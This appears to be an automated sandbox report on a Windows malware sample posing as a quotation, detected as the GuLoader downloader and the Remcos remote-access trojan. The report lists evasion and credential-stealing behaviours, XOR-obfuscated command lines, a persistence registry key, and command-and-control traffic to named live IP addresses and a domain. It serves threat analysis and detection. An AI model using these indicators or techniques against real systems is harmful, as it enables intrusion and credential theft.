Windows Analysis Report
z1Quotation.scr.exe

Overview

General Information

Sample name: z1Quotation.scr.exe
Analysis ID: 1522580
MD5: 0a648622633dbd21fef151b525657b2c
SHA1: 49a34b496d78054a1b6404dd04d9be60d071ae52
SHA256: 3cc2813b0ce3a69bd64acdbe194fa68e067a150626cf45e665a27836f39ac39d
Infos:

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Mass process execution to delay analysis
Obfuscated command line found
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Query firmware table information (likely to detect VMs)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected BrowsingHistoryView browser history reader tool
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a global mouse hook
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Spawns drivers
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Too many similar processes found
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

  • System is w10x64native
  • z1Quotation.scr.exe (PID: 2504 cmdline: "C:\Users\user\Desktop\z1Quotation.scr.exe" MD5: 0A648622633DBD21FEF151B525657B2C)
    • cmd.exe (PID: 6920 cmdline: cmd.exe /c set /a "250^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8108 cmdline: cmd.exe /c set /a "244^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2236 cmdline: cmd.exe /c set /a "227^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7528 cmdline: cmd.exe /c set /a "255^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1824 cmdline: cmd.exe /c set /a "244^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5532 cmdline: cmd.exe /c set /a "253^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5688 cmdline: cmd.exe /c set /a "130^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3488 cmdline: cmd.exe /c set /a "131^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3572 cmdline: cmd.exe /c set /a "139^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 460 cmdline: cmd.exe /c set /a "139^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6076 cmdline: cmd.exe /c set /a "242^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7528 cmdline: cmd.exe /c set /a "195^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1824 cmdline: cmd.exe /c set /a "212^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8092 cmdline: cmd.exe /c set /a "208^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2948 cmdline: cmd.exe /c set /a "197^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3488 cmdline: cmd.exe /c set /a "212^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3572 cmdline: cmd.exe /c set /a "247^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6424 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4196 cmdline: cmd.exe /c set /a "221^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1252 cmdline: cmd.exe /c set /a "212^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1188 cmdline: cmd.exe /c set /a "240^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3032 cmdline: cmd.exe /c set /a "153^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7932 cmdline: cmd.exe /c set /a "220^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7136 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7208 cmdline: cmd.exe /c set /a "195^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3492 cmdline: cmd.exe /c set /a "133^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 32 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6060 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7852 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2260 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1508 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3572 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7208 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1896 cmdline: cmd.exe /c set /a "201^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2820 cmdline: cmd.exe /c set /a "137^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2440 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5252 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6648 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1124 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3064 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 712 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1000 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 836 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7468 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2808 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2704 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7208 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1896 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2820 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2440 cmdline: cmd.exe /c set /a "193^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5828 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1500 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3492 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4600 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6380 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2448 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 836 cmdline: cmd.exe /c set /a "133^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6780 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4692 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4312 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1392 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1048 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7996 cmdline: cmd.exe /c set /a "201^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7136 cmdline: cmd.exe /c set /a "137^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2716 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • z1Quotation.scr.exe (PID: 1412 cmdline: "C:\Users\user\Desktop\z1Quotation.scr.exe" MD5: 0A648622633DBD21FEF151B525657B2C)
      • dxdiag.exe (PID: 6472 cmdline: "C:\Windows\System32\dxdiag.exe" /t C:\Users\user\AppData\Local\Temp\sysinfo.txt MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • z1Quotation.scr.exe (PID: 1224 cmdline: C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\jcokhfyxinncnfcgtxknzv" MD5: 0A648622633DBD21FEF151B525657B2C)
      • z1Quotation.scr.exe (PID: 192 cmdline: C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\hhsvynxt" MD5: 0A648622633DBD21FEF151B525657B2C)
      • z1Quotation.scr.exe (PID: 5792 cmdline: C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\pqvxpoqshoxjfvzq" MD5: 0A648622633DBD21FEF151B525657B2C)
      • z1Quotation.scr.exe (PID: 5080 cmdline: C:\Users\user\Desktop\z1Quotation.scr.exe /sort "Visit Time" /stext "C:\Users\user\AppData\Local\Temp\azdzamjeqinayzgxunqjk" MD5: 0A648622633DBD21FEF151B525657B2C)
      • WerFault.exe (PID: 7112 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1412 -s 2348 MD5: 40A149513D721F096DDF50C04DA2F01F)
      • z1Quotation.scr.exe (PID: 4224 cmdline: C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\xadmhfv" MD5: 0A648622633DBD21FEF151B525657B2C)
      • z1Quotation.scr.exe (PID: 6900 cmdline: C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\xpsjxjoeplzrro" MD5: 0A648622633DBD21FEF151B525657B2C)
      • z1Quotation.scr.exe (PID: 320 cmdline: C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\gymlnlyltcmojzwgtmnvsm" MD5: 0A648622633DBD21FEF151B525657B2C)
  • mstee.sys (PID: 4 cmdline: MD5: 244C73253E165582DDC43AF4467D23DF)
  • mskssrv.sys (PID: 4 cmdline: MD5: 26854C1F5500455757BC00365CEF9483)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution: APT33, The Gorgon Group, UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source | Rule | Description | Author
00000082.00000003.35958881929.0000000007431000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000082.00000003.35991087390.0000000007431000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000082.00000003.35968576941.0000000007431000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000082.00000003.35961051808.0000000007431000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000000.00000002.33493748290.0000000000637000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GuLoader_3 | Yara detected GuLoader | Joe Security
140.2.z1Quotation.scr.exe.400000.0.unpack | JoeSecurity_BrowsingHistoryView | Yara detected BrowsingHistoryView browser history reader tool | Joe Security
140.2.z1Quotation.scr.exe.400000.0.raw.unpack | JoeSecurity_BrowsingHistoryView | Yara detected BrowsingHistoryView browser history reader tool | Joe Security

                System Summary

                Source: Process started, Author: Max Altgelt (Nextron Systems), Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\mstee.sys, NewProcessName: C:\Windows\System32\drivers\mstee.sys, OriginalFileName: C:\Windows\System32\drivers\mstee.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: mstee.sys

                Stealing of Sensitive Information

                Source: Registry Key set, Author: Joe Security, Data: Details: EA DC AD 95 A2 7E A8 CB A3 82 EA 39 4A 1B C0 99 72 F1 66 AF EC DC 17 8C BB EF 22 57 AF C4 80 81 7E BE 76 0A 7E 56 33 A2 94 BD 90 D0 91 E3 BA 9F 58 20 0B 74 F4 99 8F 64 7B 3F 56 A4 D5 DD F0 CD A3 CD 33 3F 7B CB 8C E2 C7 EB 3C 9F 93 5D 6E 56 05 E2 8A 28 AF C4 4E 1C , EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\z1Quotation.scr.exe, ProcessId: 1412, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-ZLUOGZ\exepath

                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2024-09-30T12:05:03.461127+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49761 | 23.106.238.209 | 2404 | TCP
                2024-09-30T12:08:17.762243+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49763 | 23.106.238.209 | 2404 | TCP
                2024-09-30T12:08:18.090313+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49764 | 23.106.238.209 | 2404 | TCP
                2024-09-30T12:08:43.100498+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49767 | 23.106.238.209 | 2404 | TCP
                2024-09-30T12:08:50.927192+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49768 | 23.106.238.209 | 2404 | TCP
                2024-09-30T12:08:51.489322+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49769 | 23.106.238.209 | 2404 | TCP
                2024-09-30T12:09:07.407551+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49770 | 23.106.238.209 | 2404 | TCP
                2024-09-30T12:09:24.560134+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49771 | 23.106.238.209 | 2404 | TCP
                2024-09-30T12:09:51.882170+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49774 | 23.106.238.209 | 2404 | TCP
                2024-09-30T12:05:05.296120+0200 | 2803304 | 3 | Unknown Traffic | 192.168.11.20 | 49762 | 178.237.33.50 | 80 | TCP
                2024-09-30T12:05:00.321579+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49760 | 102.65.21.26 | 443 | TCP

                AV Detection

                Source: telesavers.co.za, Virustotal: Detection: 13%
                Source: http://geoplugin.net/json.gp, Virustotal: Detection: 6%
                Source: z1Quotation.scr.exe, Virustotal: Detection: 18%
                Source: Yara match, File source: 00000082.00000003.35958881929.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
